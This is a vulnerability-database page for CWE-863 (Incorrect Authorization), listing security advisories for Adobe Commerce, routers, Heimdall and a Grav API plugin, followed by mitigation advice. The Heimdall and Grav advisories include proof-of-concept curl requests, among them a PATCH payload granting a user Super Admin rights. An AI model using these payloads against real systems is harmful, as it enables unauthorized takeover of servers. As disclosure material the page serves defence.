Common Weakness Enumeration

CWE-863

Allowed-with-Review

Incorrect Authorization

Abstraction: Class · Status: Incomplete

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

5562 vulnerabilities reference this CWE, most recent first.

GHSA-R887-HMXM-R2H5

Vulnerability from github – Published: 2026-03-11 03:31 – Updated: 2026-03-11 03:31
VLAI
Details

Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and have limited impact to the integrity and availability of data. The exploit depends on conditions beyond the attacker's control. Exploitation of this issue does not require user interaction.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-21359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-11T03:15:55Z",
    "severity": "MODERATE"
  },
  "details": "Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and have limited impact to the integrity and availability of data. The exploit depends on conditions beyond the attacker\u0027s control. Exploitation of this issue does not require user interaction.",
  "id": "GHSA-r887-hmxm-r2h5",
  "modified": "2026-03-11T03:31:28Z",
  "published": "2026-03-11T03:31:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21359"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/magento/apsb26-05.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R89H-R4W4-JR4P

Vulnerability from github – Published: 2021-12-02 00:00 – Updated: 2022-06-29 00:00
VLAI
Details

Improper access control vulnerability in ELECOM routers (WRC-1167GST2 firmware v1.25 and prior, WRC-1167GST2A firmware v1.25 and prior, WRC-1167GST2H firmware v1.25 and prior, WRC-2533GS2-B firmware v1.52 and prior, WRC-2533GS2-W firmware v1.52 and prior, WRC-1750GS firmware v1.03 and prior, WRC-1750GSV firmware v2.11 and prior, WRC-1900GST firmware v1.03 and prior, WRC-2533GST firmware v1.03 and prior, WRC-2533GSTA firmware v1.03 and prior, WRC-2533GST2 firmware v1.25 and prior, WRC-2533GST2SP firmware v1.25 and prior, WRC-2533GST2-G firmware v1.25 and prior, and EDWRC-2533GST2 firmware v1.25 and prior) allows a network-adjacent unauthenticated attacker to bypass access restriction, and to obtain anti-CSRF tokens and change the product's settings via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-20862"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-01T03:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Improper access control vulnerability in ELECOM routers (WRC-1167GST2 firmware v1.25 and prior, WRC-1167GST2A firmware v1.25 and prior, WRC-1167GST2H firmware v1.25 and prior, WRC-2533GS2-B firmware v1.52 and prior, WRC-2533GS2-W firmware v1.52 and prior, WRC-1750GS firmware v1.03 and prior, WRC-1750GSV firmware v2.11 and prior, WRC-1900GST firmware v1.03 and prior, WRC-2533GST firmware v1.03 and prior, WRC-2533GSTA firmware v1.03 and prior, WRC-2533GST2 firmware v1.25 and prior, WRC-2533GST2SP firmware v1.25 and prior, WRC-2533GST2-G firmware v1.25 and prior, and EDWRC-2533GST2 firmware v1.25 and prior) allows a network-adjacent unauthenticated attacker to bypass access restriction, and to obtain anti-CSRF tokens and change the product\u0027s settings via unspecified vectors.",
  "id": "GHSA-r89h-r4w4-jr4p",
  "modified": "2022-06-29T00:00:42Z",
  "published": "2021-12-02T00:00:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20862"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/vu/JVNVU94527926/index.html"
    },
    {
      "type": "WEB",
      "url": "https://www.elecom.co.jp/news/security/20211130-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R8FF-5HFF-RPRQ

Vulnerability from github – Published: 2022-12-20 18:30 – Updated: 2025-04-17 15:32
VLAI
Details

D-Link DIR-869 DIR869Ax_FW102B15 is vulnerable to Authentication Bypass via phpcgi.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-46076"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-20T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "D-Link DIR-869 DIR869Ax_FW102B15 is vulnerable to Authentication Bypass via phpcgi.",
  "id": "GHSA-r8ff-5hff-rprq",
  "modified": "2025-04-17T15:32:31Z",
  "published": "2022-12-20T18:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46076"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Zarathustra-L/IoT_Vul/tree/main/D-Link/DIR-869"
    },
    {
      "type": "WEB",
      "url": "https://www.dlink.com/en/security-bulletin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R8H3-XCC9-62RW

Vulnerability from github – Published: 2022-09-14 00:00 – Updated: 2022-09-18 00:00
VLAI
Details

The mobile application in Transtek Mojodat FAM (Fixed Asset Management) 2.4.6 allows remote attackers to fetch cleartext passwords upon a successful login request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-38769"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-13T23:15:00Z",
    "severity": "HIGH"
  },
  "details": "The mobile application in Transtek Mojodat FAM (Fixed Asset Management) 2.4.6 allows remote attackers to fetch cleartext passwords upon a successful login request.",
  "id": "GHSA-r8h3-xcc9-62rw",
  "modified": "2022-09-18T00:00:32Z",
  "published": "2022-09-14T00:00:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38769"
    },
    {
      "type": "WEB",
      "url": "https://mojodat-vulnerabilities.netlify.app"
    },
    {
      "type": "WEB",
      "url": "https://transtek.com/mojodat-fixed-assets"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R8V4-4FM3-V2P5

Vulnerability from github – Published: 2022-04-12 00:00 – Updated: 2022-04-20 00:01
VLAI
Details

A permission bypass vulnerability exists when the NFC CAs access the TEE.Successful exploitation of this vulnerability may affect data confidentiality.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-22254"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-04-11T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "A permission bypass vulnerability exists when the NFC CAs access the TEE.Successful exploitation of this vulnerability may affect data confidentiality.",
  "id": "GHSA-r8v4-4fm3-v2p5",
  "modified": "2022-04-20T00:01:09Z",
  "published": "2022-04-12T00:00:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22254"
    },
    {
      "type": "WEB",
      "url": "https://consumer.huawei.com/en/support/bulletin/2022/4"
    },
    {
      "type": "WEB",
      "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-phones-202204-0000001224076294"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R8VM-PXWG-4RMM

Vulnerability from github – Published: 2023-06-12 21:30 – Updated: 2024-04-04 04:44
VLAI
Details

Milesight NCR/camera version 71.8.0.6-r5 allows authentication bypass through an unspecified method.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-32220"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-12T21:15:22Z",
    "severity": "CRITICAL"
  },
  "details": "Milesight NCR/camera version 71.8.0.6-r5 allows authentication bypass through an unspecified method.",
  "id": "GHSA-r8vm-pxwg-4rmm",
  "modified": "2024-04-04T04:44:31Z",
  "published": "2023-06-12T21:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32220"
    },
    {
      "type": "WEB",
      "url": "https://www.gov.il/en/Departments/faq/cve_advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R8X2-FHMF-6MXP

Vulnerability from github – Published: 2026-03-18 13:00 – Updated: 2026-04-27 15:22
VLAI
Summary
Heimdall: Path received via Envoy gRPC corrupted when containing query string
Details

Summary

When using heimdall in envoy gRPC decision API mode, wrong encoding of the query URL string allows rules with non-wildcard path expressions to be bypassed.

The HTTP based decision API is NOT affected, and proxy mode is NOT affected either.

Note: The issue can only lead to unintended access if heimdall is configured with an "allow all" default rule. Since v0.16.0, heimdall enforces secure defaults and refuses to start with such a configuration unless this enforcement is explicitly disabled, e.g. via --insecure-skip-secure-default-rule-enforcement or the broader --insecure flag.

Details

Envoy splits the requested URL into parts, and sends the parts individually to heimdall. Although query and path are present in the API, the query field is documented to be always empty and the URL query is included in the path field [1].

The implementation uses go's url library to reconstruct the url which automatically encodes special characters in the path.

https://github.com/dadrus/heimdall/blob/1faba9e4160bd7ab3240cf6aa418e21bfef3401a/internal/handler/envoyextauth/grpcv3/request_context.go#L109-L115

As a consequence, a parameter like /mypath?foo=bar to Path is escaped into /mypath%3Ffoo=bar. Subsequently, a rule matching /mypath no longer matches and is bypassed.

PoC

Using the example docker compose setup, the demo:public rule is bypassed when adding a query parameter.

docker compose -f docker-compose-envoy-grpc.yaml -f docker-compose.yaml up

curl http://127.0.0.1:9090/public
Hostname: 80201fead1c7
IP: 127.0.0.1
IP: ::1
IP: 172.23.0.3
RemoteAddr: 172.23.0.5:37056
GET /public HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: curl/8.19.0
Accept: */*
X-Envoy-Expected-Rq-Timeout-Ms: 15000
X-Forwarded-Proto: http
X-Request-Id: 0a1f0f06-75ef-4f14-92af-16162ea1d9e5

curl -v http://127.0.0.1:9090/public?bypass
*   Trying 127.0.0.1:9090...
* Established connection to 127.0.0.1 (127.0.0.1 port 9090) from 127.0.0.1 port 47876 
* using HTTP/1.x
> GET /public?hallo HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/8.19.0
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 401 Unauthorized
< date: Sat, 14 Mar 2026 16:34:17 GMT
< server: envoy
< content-length: 0
< 
* Connection #0 to host 127.0.0.1:9090 left intact

When using the HTTP decision API variant, the second request is matched by the rule as well:

docker compose -f docker-compose-envoy-http.yaml -f docker-compose.yaml up

curl http://127.0.0.1:9090/public?bypass
Hostname: 80201fead1c7
IP: 127.0.0.1
IP: ::1
IP: 172.23.0.4
RemoteAddr: 172.23.0.2:38044
GET /public?hallo HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: curl/8.19.0
Accept: */*
X-Envoy-Expected-Rq-Timeout-Ms: 15000
X-Forwarded-Proto: http
X-Request-Id: 5c961bc6-ad03-4a44-982b-abe04566fdd2

Impact

Everyone using heimdall with the envoy gRPC API may be affected. Users who configured a deny list in heimdall (with an allow-all default rule) are affected, as attackers can potentially circumvent a specific block rule by adding query parameters.

[1] https://github.com/envoyproxy/envoy/blob/105b4acd422d67fcff908ec38d91c7676d079939/api/envoy/service/auth/v3/attribute_context.proto#L146-L147

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.17.10"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dadrus/heimdall"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.7.0-alpha"
            },
            {
              "fixed": "0.17.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32811"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T13:00:56Z",
    "nvd_published_at": "2026-03-20T02:16:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nWhen using heimdall in envoy gRPC decision API mode, wrong encoding of the query URL string allows rules with non-wildcard path expressions to be bypassed.\n\nThe HTTP based decision API is NOT affected, and proxy mode is NOT affected either.\n\n**Note:** The issue can only lead to unintended access if heimdall is configured with an \"allow all\" default rule. Since v0.16.0, heimdall enforces secure defaults and refuses to start with such a configuration unless this enforcement is explicitly disabled, e.g. via `--insecure-skip-secure-default-rule-enforcement` or the broader `--insecure` flag.\n\n### Details\nEnvoy splits the requested URL into parts, and sends the parts individually to heimdall. Although `query` and `path` are present in the API, the `query` field is documented to be always empty and the URL query is included in the `path` field [1].\n\nThe implementation uses go\u0027s url library to reconstruct the url which automatically encodes special characters in the path. \n\n https://github.com/dadrus/heimdall/blob/1faba9e4160bd7ab3240cf6aa418e21bfef3401a/internal/handler/envoyextauth/grpcv3/request_context.go#L109-L115\n\nAs a consequence, a parameter like `/mypath?foo=bar` to `Path`  is escaped into  `/mypath%3Ffoo=bar`. Subsequently, a rule matching `/mypath` no longer matches and is bypassed.\n\n\n### PoC\n\nUsing the example docker compose setup, the `demo:public` rule is bypassed when adding a query parameter.\n\n\u003e docker compose -f docker-compose-envoy-grpc.yaml -f docker-compose.yaml up\n\n```\ncurl http://127.0.0.1:9090/public\nHostname: 80201fead1c7\nIP: 127.0.0.1\nIP: ::1\nIP: 172.23.0.3\nRemoteAddr: 172.23.0.5:37056\nGET /public HTTP/1.1\nHost: 127.0.0.1:9090\nUser-Agent: curl/8.19.0\nAccept: */*\nX-Envoy-Expected-Rq-Timeout-Ms: 15000\nX-Forwarded-Proto: http\nX-Request-Id: 0a1f0f06-75ef-4f14-92af-16162ea1d9e5\n\ncurl -v http://127.0.0.1:9090/public?bypass\n*   Trying 127.0.0.1:9090...\n* Established connection to 127.0.0.1 (127.0.0.1 port 9090) from 127.0.0.1 port 47876 \n* using HTTP/1.x\n\u003e GET /public?hallo HTTP/1.1\n\u003e Host: 127.0.0.1:9090\n\u003e User-Agent: curl/8.19.0\n\u003e Accept: */*\n\u003e \n* Request completely sent off\n\u003c HTTP/1.1 401 Unauthorized\n\u003c date: Sat, 14 Mar 2026 16:34:17 GMT\n\u003c server: envoy\n\u003c content-length: 0\n\u003c \n* Connection #0 to host 127.0.0.1:9090 left intact\n```\n\nWhen using the HTTP decision API variant, the second request is matched by the rule as well:\n\n\u003e docker compose -f docker-compose-envoy-http.yaml -f docker-compose.yaml up\n\n```\ncurl http://127.0.0.1:9090/public?bypass\nHostname: 80201fead1c7\nIP: 127.0.0.1\nIP: ::1\nIP: 172.23.0.4\nRemoteAddr: 172.23.0.2:38044\nGET /public?hallo HTTP/1.1\nHost: 127.0.0.1:9090\nUser-Agent: curl/8.19.0\nAccept: */*\nX-Envoy-Expected-Rq-Timeout-Ms: 15000\nX-Forwarded-Proto: http\nX-Request-Id: 5c961bc6-ad03-4a44-982b-abe04566fdd2\n```\n\n### Impact\n\nEveryone using heimdall with the envoy gRPC API may be affected. Users who configured a deny list in heimdall (with an allow-all default rule) are affected, as attackers can potentially circumvent a specific block rule by adding query parameters.\n\n[1] https://github.com/envoyproxy/envoy/blob/105b4acd422d67fcff908ec38d91c7676d079939/api/envoy/service/auth/v3/attribute_context.proto#L146-L147",
  "id": "GHSA-r8x2-fhmf-6mxp",
  "modified": "2026-04-27T15:22:43Z",
  "published": "2026-03-18T13:00:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dadrus/heimdall/security/advisories/GHSA-r8x2-fhmf-6mxp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32811"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dadrus/heimdall/pull/3106"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dadrus/heimdall/commit/50321b3007db1ccafdc6b1cfd6bdc3689c19a502"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dadrus/heimdall"
    },
    {
      "type": "WEB",
      "url": "https://github.com/envoyproxy/envoy/blob/105b4acd422d67fcff908ec38d91c7676d079939/api/envoy/service/auth/v3/attribute_context.proto#L146-L147"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Heimdall: Path received via Envoy gRPC corrupted when containing query string"
}

GHSA-R8XV-H575-V48P

Vulnerability from github – Published: 2022-08-19 00:00 – Updated: 2022-08-23 00:00
VLAI
Details

Improper access control in the Intel(R) DSA software for before version 22.2.14 may allow an authenticated user to potentially enable escalation of privilege via adjacent access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-26017"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-08-18T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper access control in the Intel(R) DSA software for before version 22.2.14 may allow an authenticated user to potentially enable escalation of privilege via adjacent access.",
  "id": "GHSA-r8xv-h575-v48p",
  "modified": "2022-08-23T00:00:18Z",
  "published": "2022-08-19T00:00:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26017"
    },
    {
      "type": "WEB",
      "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00679.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R945-H4VM-H736

Vulnerability from github – Published: 2026-05-05 21:20 – Updated: 2026-05-13 14:04
VLAI
Summary
Grav API Privilege Escalation to Super Admin
Details

Summary

An insecure direct object reference and logic flaw in the Grav API plugin (UsersController::update) allows any authenticated user with basic API access (api.access) to modify their own permission configuration. An attacker can exploit this to escalate their privileges to Super Administrator (admin.super and api.super), leading to full system compromise and potential RCE.

Details

The vulnerability is located in user/plugins/api/classes/Api/Controllers/UsersController.php within the update method.

The API allows users to update their own profiles if they possess the basic api.access permission:

// UsersController.php -> update()
$isSelf = $currentUser->username === $username;
if (!$isSelf) {
    $this->requirePermission($request, 'api.users.write');
} else {
    // Self-edit only requires api.access
    $this->requirePermission($request, 'api.access');
}

However, when filtering the fields that are allowed to be updated via a PATCH request, the access field (which defines the user's role and permissions) is indiscriminately included in the $allowedFields whitelist for all users:

// Partial update - only update provided fields
$allowedFields = ['email', 'fullname', 'title', 'state', 'language', 'content_editor', 'access', 'twofa_enabled'];
foreach ($allowedFields as $field) {
    if (array_key_exists($field, $body)) {
        $user->set($field, $body[$field]);
    }
}

Because there is no secondary check to verify if the user attempting to modify the access field is already an administrator, any low-privileged user can overwrite their own access object with a malicious payload granting themselves super: true.

PoC

  1. Prerequisites: You need a low-privileged user account (eg. user1) that possesses the basic api.access permission.

  2. Obtain JWT: Authenticate to the API to obtain your access_token:

bash curl -X POST http://<target>/api/v1/auth/token \ -H "Content-Type: application/json" \ -d '{"username":"user1","password":"your_password"}'

  1. Exploit: Send a PATCH request to the user update endpoint.

bash curl -X PATCH http://<target>/api/v1/users/user1 \ -H "X-API-Token: <your_access_token>" \ -H "Content-Type: application/json" \ -d "{\"access\":{\"admin\":{\"login\":true,\"super\":true},\"api\":{\"access\":true,\"super\":true},\"site\":{\"login\":true}}}"

  1. Verification: Log in to the Grav Admin panel using the user credentials. You will now have full Super Administrator privileges.

Impact

This is a vertical Privilege Escalation vulnerability. Any user with baseline API access can elevate themselves to Super Admin. Once Super Admin privileges are obtained, the attacker takes complete control over the CMS. They can modify content, alter configurations, upload malicious plugins, or edit Twig templates outside of the sandbox to achieve RCE on the server.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav-plugin-api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.0-beta.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42843"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T21:20:03Z",
    "nvd_published_at": "2026-05-11T17:16:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAn insecure direct object reference and logic flaw in the Grav API plugin (`UsersController::update`) allows any authenticated user with basic API access (`api.access`) to modify their own permission configuration. An attacker can exploit this to escalate their privileges to Super Administrator (`admin.super` and `api.super`), leading to full system compromise and potential RCE.\n\n### Details\n\nThe vulnerability is located in `user/plugins/api/classes/Api/Controllers/UsersController.php` within the `update` method.\n\nThe API allows users to update their own profiles if they possess the basic `api.access` permission:\n\n```php\n// UsersController.php -\u003e update()\n$isSelf = $currentUser-\u003eusername === $username;\nif (!$isSelf) {\n    $this-\u003erequirePermission($request, \u0027api.users.write\u0027);\n} else {\n    // Self-edit only requires api.access\n    $this-\u003erequirePermission($request, \u0027api.access\u0027);\n}\n```\n\nHowever, when filtering the fields that are allowed to be updated via a `PATCH` request, the `access` field (which defines the user\u0027s role and permissions) is indiscriminately included in the `$allowedFields` whitelist for all users:\n\n```php\n// Partial update - only update provided fields\n$allowedFields = [\u0027email\u0027, \u0027fullname\u0027, \u0027title\u0027, \u0027state\u0027, \u0027language\u0027, \u0027content_editor\u0027, \u0027access\u0027, \u0027twofa_enabled\u0027];\nforeach ($allowedFields as $field) {\n    if (array_key_exists($field, $body)) {\n        $user-\u003eset($field, $body[$field]);\n    }\n}\n```\n\nBecause there is no secondary check to verify if the user attempting to modify the `access` field is already an administrator, any low-privileged user can overwrite their own `access` object with a malicious payload granting themselves `super: true`.\n\n### PoC\n\n1. **Prerequisites**: You need a low-privileged user account (eg. `user1`) that possesses the basic `api.access` permission.\n\n2. **Obtain JWT**: Authenticate to the API to obtain your `access_token`:\n\n   ```bash\n   curl -X POST http://\u003ctarget\u003e/api/v1/auth/token \\\n     -H \"Content-Type: application/json\" \\\n     -d \u0027{\"username\":\"user1\",\"password\":\"your_password\"}\u0027\n   ```\n\n3. **Exploit**: Send a `PATCH` request to the user update endpoint. \n\n   ```bash\n   curl -X PATCH http://\u003ctarget\u003e/api/v1/users/user1 \\\n     -H \"X-API-Token: \u003cyour_access_token\u003e\" \\\n     -H \"Content-Type: application/json\" \\\n     -d \"{\\\"access\\\":{\\\"admin\\\":{\\\"login\\\":true,\\\"super\\\":true},\\\"api\\\":{\\\"access\\\":true,\\\"super\\\":true},\\\"site\\\":{\\\"login\\\":true}}}\"\n   ```\n\n4. **Verification**: Log in to the Grav Admin panel using the user credentials. You will now have full Super Administrator privileges.\n\n### Impact\n\nThis is a vertical Privilege Escalation vulnerability. Any user with baseline API access can elevate themselves to Super Admin. Once Super Admin privileges are obtained, the attacker takes complete control over the CMS. They can modify content, alter configurations, upload malicious plugins, or edit Twig templates outside of the sandbox to achieve RCE on the server.",
  "id": "GHSA-r945-h4vm-h736",
  "modified": "2026-05-13T14:04:22Z",
  "published": "2026-05-05T21:20:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42843"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav-plugin-api/commit/26f529c7d438c73343e82311fb095caeaf1a6116"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Grav API Privilege Escalation to Super Admin"
}

GHSA-R95V-7X7V-PHW8

Vulnerability from github – Published: 2024-09-10 18:30 – Updated: 2026-07-05 03:31
VLAI
Details

Shenzhen Haichangxing Technology Co., Ltd HCX H822 4G LTE Router M7628NNxISPxUIv2_v1.0.1557.15.35_P0 is vulnerable to Incorrect Access Control. Unauthenticated factory mode reset and command injection leads to information exposure and root shell access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-44667"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-10T17:15:37Z",
    "severity": "HIGH"
  },
  "details": "Shenzhen Haichangxing Technology Co., Ltd HCX H822 4G LTE Router M7628NNxISPxUIv2_v1.0.1557.15.35_P0 is vulnerable to Incorrect Access Control. Unauthenticated factory mode reset and command injection leads to information exposure and root shell access.",
  "id": "GHSA-r95v-7x7v-phw8",
  "modified": "2026-07-05T03:31:35Z",
  "published": "2024-09-10T18:30:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-44667"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/%40sengkyaut/unauthenticated-factory-mode-reset-and-at-command-injection-in-jboneos-or-jbonecloud-firmware-1dec156b7ddd"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@sengkyaut/unauthenticated-factory-mode-reset-and-at-command-injection-in-jboneos-or-jbonecloud-firmware-1dec156b7ddd"
    },
    {
      "type": "WEB",
      "url": "http://shenzhen.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

No CAPEC attack patterns related to this CWE.